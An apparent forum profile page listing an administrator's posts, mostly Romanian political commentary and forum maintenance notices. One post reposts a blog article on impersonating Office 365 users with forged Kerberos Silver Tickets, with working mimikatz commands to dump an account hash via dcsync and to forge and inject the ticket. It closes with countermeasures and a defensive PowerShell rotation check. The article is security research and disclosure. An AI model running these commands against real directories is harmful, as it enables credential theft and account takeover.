Nytro

Administrators
  • Posts

    18777
  • Joined

  • Last visited

  • Days Won

    732

Everything posted by Nytro

  1. I agree, I expect a lot, but for now I want that OUG (emergency ordinance) repealed. I also want transparency. I want us to know what is happening in the country too, not to have OUGs issued at night without even being on the agenda. The people elected this Government for certain promises, and this is our Government. I hope they understand that we are keeping an eye on them.
  2. He had no way of not appointing a prime minister from PSD (or ALDE), nor of keeping PSD out of government. As for the "war" that shit-eater is talking about, that is not the case; it was not the President who brought people into the streets. So fuck Tariceanu. Edit: Regarding the discussion with Dragnea, what he said is true, the Ordinance "does not get him out of the trial". The trial will continue, but he will not be found guilty. And that is how he fooled (not lied to) millions of people. It is a simple manipulation technique: you tell the truth in a form that implies one thing when it is actually about something else. Info: Incitement to abuse of office falls under abuse of office. The damage is about 120,000 RON, which is less than 200,000 RON. And the trial is ongoing, it will not be a retroactive decision. That is, the mustachioed one gets out of this case.
  3. There are two types of amendments: 1. Amendment to the Criminal Code - takes effect in 10 days 2. Amendment to the Criminal Procedure Code - takes effect upon publication in the Monitorul Oficial. The fucking ordinance contains both amendments of type 1 and amendments of type 2. http://www.digi24.ro/opinii/ordonanta-de-marti-explicata-2-661815 In detail: https://blog.factual.ro/myth-busting-si-faq-dezbaterea-publica-despre-ordonante/
  4. For those who do not understand: https://www.facebook.com/ioana.chitu.5/videos/10154591999362912/ Something funny: https://www.facebook.com/viceromania/videos/1462295087128108/?hc_ref=NEWSFEED
  5. Shit! I forgot to go through Tor. PS: I looked at a few recordings, many faces are visible, but I do NOT recognize anyone from PCH (Peluza Catalin Hildan), although I know many of them by sight.
  6. Soros emailed me and supposedly he is sending us the money in Bitcoin.
  7. I want to mention that it was not "Dinamo's supporters' gallery". As happened with Ponta, only a few from the gallery got involved, as probably here too, for money. But at the first match, almost the whole stand was cursing Ponta. They probably were not paid very well, since no money is put into the team either (which is a business). So they were some starving wretches, some (or all) of whom are part of the stand.
  8. It has been published in the Monitorul Oficial. Fuck PSD and the fucking Government.
  9. Staff members are forced to use 2FA. You can still steal our cookies. That does not mean you will have access to AdminCP. We have 3FA
  10. You can now set up Two-Factor authentication using the default (black) theme as well.
  11. I updated IP Board: https://invisionpower.com/release-notes/ What is new: Two factor authentication. However, for now it can only be set up using the Default template.
  12. It happened to me too when I got to the office. I spent 2 minutes installing a certificate from Let's Encrypt, I recommend it. Is it OK now?
  13. I will check.
  14. Oh yes, the renewal will probably cost 30 EURO, so they can recoup the loss.
  15. Start fuzzing on Adobe Reader, find a crash, reproduce it, try to exploit it, exploit it, bypass mitigations, write a POC, write a full exploit.
  16. Nytro

    Fun stuff

  17. It is not relevant what server it is. Xeon, 32 GB. The point is for you to tell me if problems appear.
  18. Clear the cache or something, maybe it is keeping the old certificate, I do not know.
  19. Finally something new.
  20. Hi, I have migrated to a new server, which means various problems may appear. Post here what kinds of problems you run into and we will fix them as quickly as we can. Thanks, // Nytro
  21. http://m.zf.ro/eveniment/asa-cum-vede-dragnea-romania-nu-avem-nevoie-de-angajati-cu-salarii-mari-si-nici-de-industrii-de-elita-16065908
  22. Because they already pay more than others through CAS and CASS. People in IT, having high salaries, also have high contributions, but fuck-all benefits. You go to the hospital, you stand in line with those who pay 50 RON/month and you get the same "benefits" when you pay a good few million. In addition, IT accounts for over 6% of GDP. Billions of dollars come into the country. Taxes are paid on this money and this money gets spent. It is an industry that helps Romania and that is why it must be supported. PS: There are various other benefits in other fields too, like agriculture, start-ups (not necessarily IT) and who knows what else.
  23. Not for now, we are waiting to see whether this measure is taken or not. Fuck PSD, always!
  24. Almost half of the employees in Romania's IT industry might no longer benefit from the income tax exemption. An amendment made to the Fiscal Code at the end of last year and now published in the Monitorul Oficial provides that only those who produce software will continue to benefit from this facility. The amendment adopted by the government in December concerns the definition of software production activity, but the text that appeared in the Monitorul Oficial leaves room for interpretation. It follows that those who produce software programs will be exempt from the 16% tax, but it does not specify very clearly what happens to people who modify these products or contribute to improving them. There are 30,000 IT employees who handle the maintenance of applications or modify software products. In Romania's IT industry there are 75,500 employees working in 14,000 companies. The IT industry in Romania has grown in recent years, representing 3% of GDP in 2012 and, in 2016, 6% of GDP. The revenue generated is over 3.6 billion euros. There are two options: either the government amends the implementing rules so that things are much clearer, or the Ministry of Finance issues a new order establishing a new, much clearer definition of software production activity. (Source: Digi24) Source: http://www.digi24.ro/stiri/economie/angajatii-it-fara-scutire-la-impozitul-pe-venit-651101
  25. Impersonating Office 365 Users With Mimikatz

      January 15, 2017 | Michael Grafnetter

      Introduction

      Last month, Microsoft introduced a new feature of Azure AD Connect called Single Sign On. It allows companies to configure SSO between AD and AAD without the need to deploy ADFS, which makes it an ideal solution for SMEs. Here is a high-level diagram of this functionality:

      As we can see from the diagram above, Azure AD exposes a publicly available endpoint that accepts Kerberos tickets and translates them into SAML and JWT tokens, which are understood and trusted by other cloud services like Office 365, Azure or Salesforce. And wherever you have Kerberos-based authentication, it can be attacked using Silver Tickets.

      In usual circumstances this attack can only be performed from the intranet. But what really caught my attention is the fact that with this new SSO feature, Silver Tickets could be used from the entire internet. Let’s give it a try then!

      The Nasty Stuff

      To test this technique, we need to retrieve some information from Active Directory first:

      • NTLM password hash of the AZUREADSSOACC account, e.g. f9969e088b2c13d93833d0ce436c76dd. This value can be retrieved from AD using mimikatz:

            mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

        My own DSInternals PowerShell Module could do the same job:

            Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso `
                -Server lon-dc1.contoso.local

        Both of these commands need Domain Admins permissions.
      • Name of the AD domain, e.g. contoso.local.
      • AAD logon name of the user we want to impersonate, e.g. elrond@contoso.com. This is typically either his userPrincipalName or mail attribute from the on-prem AD.
      • SID of the user we want to impersonate, e.g. S-1-5-21-2121516926-2695913149-3163778339-1234.

      Having this information we can now create and use the Silver Ticket on any Windows computer connected to the internet. It does not even matter whether it is joined to a domain or a workgroup:

      • Create the Silver Ticket and inject it into Kerberos cache:

            mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit

      • Launch Mozilla Firefox.
      • Go to about:config and set the network.negotiate-auth.trusted-uris preference to value “https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com”.
      • Navigate to any web application that is integrated with our AAD domain. We will use Office 365, which is the most commonly used one.
      • Once at the logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER.
      • That’s it, we’re in!

      To log in as another user, run the command below and repeat steps 1-6.

            klist purge

      It is also worth noting that the password of the AZUREADSSOACC account never changes, so the stolen hash/key will work forever. It could therefore be misused by highly privileged employees to retain access to the IT environment after leaving the company. Dealing with such situations is a much broader problem, which is aptly depicted by the following old Narnian saying:

      Countermeasures

      First of all, I have to point out that this technique would not be very practical in real-world situations due to these reasons:

      • The SSO feature is in Preview and has to be explicitly enabled by an AD admin. Just a handful of companies probably use it at the time of writing this article and enterprises will quite surely stick to their proven ADFS deployments even after this feature reaches GA.
      • The hash/key of the AZUREADSSOACC account can only be retrieved by Domain Admins from DCs by default. But if an attacker had such highly privileged access to an Active Directory domain, he/she would be able to do some way nastier stuff than just replicating a single hash.
      • The password of the AZUREADSSOACC account is randomly generated during the deployment of Azure AD Connect. It would therefore be impossible to guess this password.

      As you can see, there is simply no need to panic. But just to be safe, I would recommend these generic security measures:

      • Only delegate administrative access to trusted individuals and keep the number of members of the Domain Admins group (and other privileged groups) as low as possible.
      • Protect backups of Domain Controllers, so no-one could extract sensitive information from them.
      • Enable and enforce Azure MFA for users authenticating from external IP addresses. It is very straightforward and effective against many kinds of attacks.
      • Consider implementing Azure AD conditional access.
      • Deploy Microsoft Advanced Threat Analytics to detect malicious replication and other threats to your AD infrastructure.
      • Force a password change on the AZUREADSSOACC account by re-deploying Azure AD Connect SSO after a highly privileged employee leaves the company. This should be done together with resetting the password of krbtgt and other sensitive accounts.

      I am also quite sure that the Azure AD team at Microsoft is fully aware of this potential threat and there is a chance that they could implement some kind of heuristics to detect forged Kerberos tickets in the future. It would also be nice if they implemented automatic password changes for AZUREADSSOACC (or it is already there and I just missed it). Again, we are talking about a feature that has not even reached the GA stage yet, so it is too soon to judge.

      Conclusion

      Although the Silver Ticket attack has been here for some years, it is now probably the first time it can be used over the internet against a cloud service, which theoretically makes it even more potent. On the other hand, it would be quite hard to perform this technique in a real-world environment due to impracticalities discussed in the previous section, so there is no need to worry. The new SSO feature of Azure AD Connect can therefore be considered safe and I would recommend using it.

      Source: https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
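
A defender-side check for two of the countermeasures the article above lists (rolling the AZUREADSSOACC key after a privileged departure, and keeping Domain Admins small), as an added example that is not part of the original post or of the DSInternals module. It assumes the ActiveDirectory RSAT module and that the SSO account is a computer object with the sAMAccountName AZUREADSSOACC$; the function name Test-AadSsoKeyRotation and its parameters are hypothetical.

```powershell
# Added example (not from the article). Requires the ActiveDirectory RSAT module
# and ordinary read access to the domain; no privileged rights are needed.
Import-Module ActiveDirectory

function Test-AadSsoKeyRotation {
    [CmdletBinding()]
    param(
        # Cutoff supplied by the operator, e.g. the day a Domain Admin left.
        [Parameter(Mandatory)] [datetime] $RolledSince,
        # Assumption: the SSO account is the computer object named on the page.
        [string] $SamAccountName = 'AZUREADSSOACC$'
    )

    $acct = Get-ADComputer -LDAPFilter "(sAMAccountName=$SamAccountName)" `
                           -Properties PasswordLastSet, whenCreated
    if (-not $acct) {
        Write-Warning "$SamAccountName not found; Azure AD Connect SSO may not be deployed."
        return
    }

    # The article notes the hash is retrievable by Domain Admins by default, so the
    # size of that group (well-known RID 512) bounds who could hold a copy of the key.
    $daSid  = "$((Get-ADDomain).DomainSID.Value)-512"
    $admins = @(Get-ADGroupMember -Identity $daSid -Recursive)

    $lastSet = $acct.PasswordLastSet   # $null when the directory holds no value
    [pscustomobject]@{
        Account           = $acct.SamAccountName
        Created           = $acct.whenCreated
        PasswordLastSet   = $lastSet
        KeyAgeDays        = if ($lastSet) { [int]((Get-Date) - $lastSet).TotalDays } else { $null }
        RolledSinceCutoff = [bool]($lastSet -and $lastSet -gt $RolledSince)
        DomainAdminCount  = $admins.Count
    }
}

# Constructed usage: was the key rolled after a departure on 2017-01-31?
Test-AadSsoKeyRotation -RolledSince '2017-01-31' |
    Where-Object { -not $_.RolledSinceCutoff } |
    ForEach-Object { Write-Warning "$($_.Account) key predates the cutoff; re-deploy Azure AD Connect SSO." }
```

A PasswordLastSet equal to the account's creation time means the key has never been rolled since Azure AD Connect SSO was deployed.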